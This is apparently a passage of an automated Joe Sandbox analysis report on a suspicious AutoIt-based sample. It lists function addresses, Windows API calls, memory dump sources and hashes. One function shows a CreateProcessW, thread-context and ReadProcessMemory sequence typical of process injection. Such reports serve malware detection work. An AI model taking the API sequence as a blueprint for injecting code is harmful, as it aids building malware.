                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007E571C: __FF_MSGBANNER.LIBCMT ref: 007E5733
                                                          • Part of subcall function 007E571C: __NMSG_WRITE.LIBCMT ref: 007E573A
                                                          • Part of subcall function 007E571C: RtlAllocateHeap.NTDLL(00EC0000,00000000,00000001,00000000,?,?,?,007E0DD3,?), ref: 007E575F
                                                        • std::exception::exception.LIBCMT ref: 007E0DEC
                                                        • __CxxThrowException@8.LIBCMT ref: 007E0E01
                                                          • Part of subcall function 007E859B: RaiseException.KERNEL32(?,?,?,00879E78,00000000,?,?,?,?,007E0E06,?,00879E78,?,00000001), ref: 007E85F0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                        • String ID:
                                                        • API String ID: 3902256705-0
                                                        • Opcode ID: 07604dbdbdda548944655ea0cd5a264fc34bc933630a88c7852eaaf564299d06
                                                        • Instruction ID: a3f97473f11e983a07257f9b1733dbb54de8b214686a55da94c6305f417a3d47
                                                        • Opcode Fuzzy Hash: 07604dbdbdda548944655ea0cd5a264fc34bc933630a88c7852eaaf564299d06
                                                        • Instruction Fuzzy Hash: 1EF0A93150225DA6CB10FAEADC099DE77ACEF09311F104429FD18D6191DFB49A9486D1
                                                        Function 007E53A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007E8B28: __getptd_noexit.LIBCMT ref: 007E8B28
                                                        • __lock_file.LIBCMT ref: 007E53EB
                                                          • Part of subcall function 007E6C11: __lock.LIBCMT ref: 007E6C34
                                                        • __fclose_nolock.LIBCMT ref: 007E53F6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                        • String ID:
                                                        • API String ID: 2800547568-0
                                                        • Opcode ID: 13b6f6e7da91394954361ca87d492e75f1ce8e67ea7a243d05909b5f1527a20c
                                                        • Instruction ID: b0bc1b5b63fb1201a629bcf7284752ca5a26c63af77657ff5bdd0b7b57c26f8c
                                                        • Opcode Fuzzy Hash: 13b6f6e7da91394954361ca87d492e75f1ce8e67ea7a243d05909b5f1527a20c
                                                        • Instruction Fuzzy Hash: 61F09671903A88DAD750AB6798097AD77A06F4937DF348105A428AB1C1CFBC99415B52
                                                        Function 00F73235 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 00F739F3
                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00F73A89
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00F73AAB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668345500.0000000000F71000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F71000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f71000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                        • String ID:
                                                        • API String ID: 2438371351-0
                                                        • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                        • Instruction ID: 5a4606fda0cf389a81e6d15916c4348a8bf29a5f186c0b11ab8ee257b808fdae
                                                        • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                        • Instruction Fuzzy Hash: 2B12CE24E24658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A5E77A4F81DF5A
                                                        Function 007C750F Relevance: 1.6, APIs: 1, Instructions: 103COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID:
                                                        • API String ID: 4104443479-0
                                                        • Opcode ID: f7e2fd9dc63d4305cbfa272c9752891b5bbd0a2c922b30b3a1f7383ea5cc6e6f
                                                        • Instruction ID: a5db94a81aa8342bb7a7d3eb49db3ccaf439c686956f97ad269bc865b29b4e10
                                                        • Opcode Fuzzy Hash: f7e2fd9dc63d4305cbfa272c9752891b5bbd0a2c922b30b3a1f7383ea5cc6e6f
                                                        • Instruction Fuzzy Hash: 09317E79608A02EFC718DF19D490E21F7A0FF09310714C56DE98A8B791EB74E891CF94
                                                        Function 007E0C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual
                                                        • String ID:
                                                        • API String ID: 544645111-0
                                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                        • Instruction ID: fa6e3c4c4e7b8dd7984d8d0be01ce48be71d142196050f9d1a186a45dce5a64a
                                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                        • Instruction Fuzzy Hash: 09311370A021459BC718DF0AC480AA9F7A2FB4D300B3487A5E80ACB361D7B5EDC1DBE0
                                                        Function 007FFCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ClearVariant
                                                        • String ID:
                                                        • API String ID: 1473721057-0
                                                        • Opcode ID: bc8ba207c6eb3c499db93f217c7559a6f6f8f336a28cc376536e8a64f81005df
                                                        • Instruction ID: f6b583acefe5f0bbb87ef3185336d8f3ac196f2c70b1d6d77462f9411f6f3490
                                                        • Opcode Fuzzy Hash: bc8ba207c6eb3c499db93f217c7559a6f6f8f336a28cc376536e8a64f81005df
                                                        • Instruction Fuzzy Hash: 0241E574604345DFDB24DF24C458F1ABBE0BF49318F0988ACE9998B362C775E845CB52
                                                        Function 007C7B53 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID:
                                                        • API String ID: 4104443479-0
                                                        • Opcode ID: 3aa974c2351fdbd07aa32aee7350dc1956dcdd9e1470d55e10f725a6f9468a74
                                                        • Instruction ID: f661a22d0de59d0c4a79147e143b767d9d10ed4c2f6d39a01b4c489bbf3e4a07
                                                        • Opcode Fuzzy Hash: 3aa974c2351fdbd07aa32aee7350dc1956dcdd9e1470d55e10f725a6f9468a74
                                                        • Instruction Fuzzy Hash: 022136B2A04A08EBDB188F25EC45B797BB4FF14350F20842EF58AC52A0EB74C5D0DB55
                                                        Function 007C4DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007C4BB5: FreeLibrary.KERNEL32(00000000,?), ref: 007C4BEF
                                                          • Part of subcall function 007E525B: __wfsopen.LIBCMT ref: 007E5266
                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,008852F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 007C4E0F
                                                          • Part of subcall function 007C4B6A: FreeLibrary.KERNEL32(00000000), ref: 007C4BA4
                                                          • Part of subcall function 007C4C70: _memmove.LIBCMT ref: 007C4CBA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Library$Free$Load__wfsopen_memmove
                                                        • String ID:
                                                        • API String ID: 1396898556-0
                                                        • Opcode ID: 392fbbc91f85604bf9247b2c461c7cb5b2976f217deb78a12ff7c286c3be53b2
                                                        • Instruction ID: 0119564c6e1097d27170cf04a8ddff211d7ecc6e3e1bb123399397793eda21d6
                                                        • Opcode Fuzzy Hash: 392fbbc91f85604bf9247b2c461c7cb5b2976f217deb78a12ff7c286c3be53b2
                                                        • Instruction Fuzzy Hash: 1311A731640209EBCF25AFB4C82AFAD77A9AF44750F10842DFA51A7181DB799D019751
                                                        Function 007FFD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ClearVariant
                                                        • String ID:
                                                        • API String ID: 1473721057-0
                                                        • Opcode ID: 1f2229621c5a47f3ece2d3b634f1a9aa060bdf4886c0eea23b69adc4db0334a6
                                                        • Instruction ID: da67326fd4d7efaa17230e18b814eac8ef2ae8f6088bd85a985de45780654566
                                                        • Opcode Fuzzy Hash: 1f2229621c5a47f3ece2d3b634f1a9aa060bdf4886c0eea23b69adc4db0334a6
                                                        • Instruction Fuzzy Hash: 7A21EEB4608345DFCB24DF64C848F1ABBE0BF88315F05896CE98A97762D735E805CB92
                                                        Function 007E072A Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 828625f052f4f8645734e182d12e795b27bcf1cb8371bf6a93eda34a18f04556
                                                        • Instruction ID: 3d27a5f1fc45f62e6434e7cc51cf94241aad765a18db94214e393aaa34c39d30
                                                        • Opcode Fuzzy Hash: 828625f052f4f8645734e182d12e795b27bcf1cb8371bf6a93eda34a18f04556
                                                        • Instruction Fuzzy Hash: D101F136502350DFDB315E69EC45AEAB3A8FFC9321B0540AEF904DB411E6F99C89CAD0
                                                        Function 007E4863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __lock_file.LIBCMT ref: 007E48A6
                                                          • Part of subcall function 007E8B28: __getptd_noexit.LIBCMT ref: 007E8B28
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: __getptd_noexit__lock_file
                                                        • String ID:
                                                        • API String ID: 2597487223-0
                                                        • Opcode ID: 0e89e34785c265052e5a40d8d8a4842611656c007602ee7394331e1175e89950
                                                        • Instruction ID: 946429bbb5aa806e219cbbf305e3cf0539576478b0d78c97316470d99996ae22
                                                        • Opcode Fuzzy Hash: 0e89e34785c265052e5a40d8d8a4842611656c007602ee7394331e1175e89950
                                                        • Instruction Fuzzy Hash: 58F022319036C8EBDF51AFB6CC0E3AE36A0AF08324F148404F428AA1D2CB7CC950DB52
                                                        Function 007C4E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FreeLibrary.KERNEL32(?,?,008852F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 007C4E7E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: FreeLibrary
                                                        • String ID:
                                                        • API String ID: 3664257935-0
                                                        • Opcode ID: 3058ae84608d709f9407d53349098bdff631d1ca7ea17bcdd483b78a7c2cdf84
                                                        • Instruction ID: 279bf4fdd355807c5840feecfcfea010ea1b3b4077a19e366c6ada01e1e83143
                                                        • Opcode Fuzzy Hash: 3058ae84608d709f9407d53349098bdff631d1ca7ea17bcdd483b78a7c2cdf84
                                                        • Instruction Fuzzy Hash: F5F03971505B11DFCB349F64E4A4D52BBF1BF143293218A3EE2DA82621C73A9840DF40
                                                        Function 007E0791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007E07B0
                                                          • Part of subcall function 007C7BCC: _memmove.LIBCMT ref: 007C7C06
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: LongNamePath_memmove
                                                        • String ID:
                                                        • API String ID: 2514874351-0
                                                        • Opcode ID: e53249dbc88d4e1fecc07f3c89d88b9339df8131186674fcb6f771f67f546451
                                                        • Instruction ID: f64ab81377f061c03902a8f93f3ddfd9d79f8431da49fc2d3a99d4bc8e91393e
                                                        • Opcode Fuzzy Hash: e53249dbc88d4e1fecc07f3c89d88b9339df8131186674fcb6f771f67f546451
                                                        • Instruction Fuzzy Hash: 71E086769051289BC720D6589C09FEA779DDF897A0F0441B9FD08D7205D9A5AC8086D0
                                                        Function 007E525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: __wfsopen
                                                        • String ID:
                                                        • API String ID: 197181222-0
                                                        • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                        • Instruction ID: 3dda556f60804fb75d6971da946d732a1cc61096a7cb5628db178f43ac2c7e25
                                                        • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                        • Instruction Fuzzy Hash: B7B092B644020CB7CE012A82EC02A493B1DAB45768F408020FB0C1C162A677A6649A89
                                                        Function 00F74238 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Sleep.KERNELBASE(000001F4), ref: 00F74249
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668345500.0000000000F71000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F71000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f71000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID:
                                                        • API String ID: 3472027048-0
                                                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                        • Instruction ID: d6d1e461c415d91b871556454a582000b761cea03ca5c5567a0b013f31dc02dc
                                                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                        • Instruction Fuzzy Hash: 2FE0E67498420DDFDB00DFB4D54969D7BB4EF04301F104161FD05D2280D7309D60DA62

                                                        Non-executed Functions

                                                        Function 0084CABC Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 632windowkeyboardCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007C2612: GetWindowLongW.USER32(?,000000EB), ref: 007C2623
                                                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0084CB37
                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0084CB95
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0084CBD6
                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0084CC00
                                                        • SendMessageW.USER32 ref: 0084CC29
                                                        • _wcsncpy.LIBCMT ref: 0084CC95
                                                        • GetKeyState.USER32(00000011), ref: 0084CCB6
                                                        • GetKeyState.USER32(00000009), ref: 0084CCC3
                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0084CCD9
                                                        • GetKeyState.USER32(00000010), ref: 0084CCE3
                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0084CD0C
                                                        • SendMessageW.USER32 ref: 0084CD33
                                                        • SendMessageW.USER32(?,00001030,?,0084B348), ref: 0084CE37
                                                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0084CE4D
                                                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0084CE60
                                                        • SetCapture.USER32(?), ref: 0084CE69
                                                        • ClientToScreen.USER32(?,?), ref: 0084CECE
                                                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0084CEDB
                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0084CEF5
                                                        • ReleaseCapture.USER32 ref: 0084CF00
                                                        • GetCursorPos.USER32(?), ref: 0084CF3A
                                                        • ScreenToClient.USER32(?,?), ref: 0084CF47
                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0084CFA3
                                                        • SendMessageW.USER32 ref: 0084CFD1
                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0084D00E
                                                        • SendMessageW.USER32 ref: 0084D03D
                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0084D05E
                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0084D06D
                                                        • GetCursorPos.USER32(?), ref: 0084D08D
                                                        • ScreenToClient.USER32(?,?), ref: 0084D09A
                                                        • GetParent.USER32(?), ref: 0084D0BA
                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0084D123
                                                        • SendMessageW.USER32 ref: 0084D154
                                                        • ClientToScreen.USER32(?,?), ref: 0084D1B2
                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0084D1E2
                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0084D20C
                                                        • SendMessageW.USER32 ref: 0084D22F
                                                        • ClientToScreen.USER32(?,?), ref: 0084D281
                                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0084D2B5
                                                          • Part of subcall function 007C25DB: GetWindowLongW.USER32(?,000000EB), ref: 007C25EC
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0084D351
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                        • String ID: 0R$@GUI_DRAGID$F
                                                        • API String ID: 3977979337-259995135
                                                        • Opcode ID: 6ece22a32a0fc9fb6647080ada65568833ac8c378fc65d67ada2a8156f2bff7f
                                                        • Instruction ID: 2db9afd62d8b9c317a9152ef2f52b20ef4dc3386c7b3367140ebad012b806613
                                                        • Opcode Fuzzy Hash: 6ece22a32a0fc9fb6647080ada65568833ac8c378fc65d67ada2a8156f2bff7f
                                                        • Instruction Fuzzy Hash: 3A429A78205349AFDB20DF28C888EAABBE9FF49324F14052DF695C72A1D731D854DB52
                                                        Function 007D6F9E Relevance: 52.3, APIs: 19, Strings: 8, Instructions: 5018COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
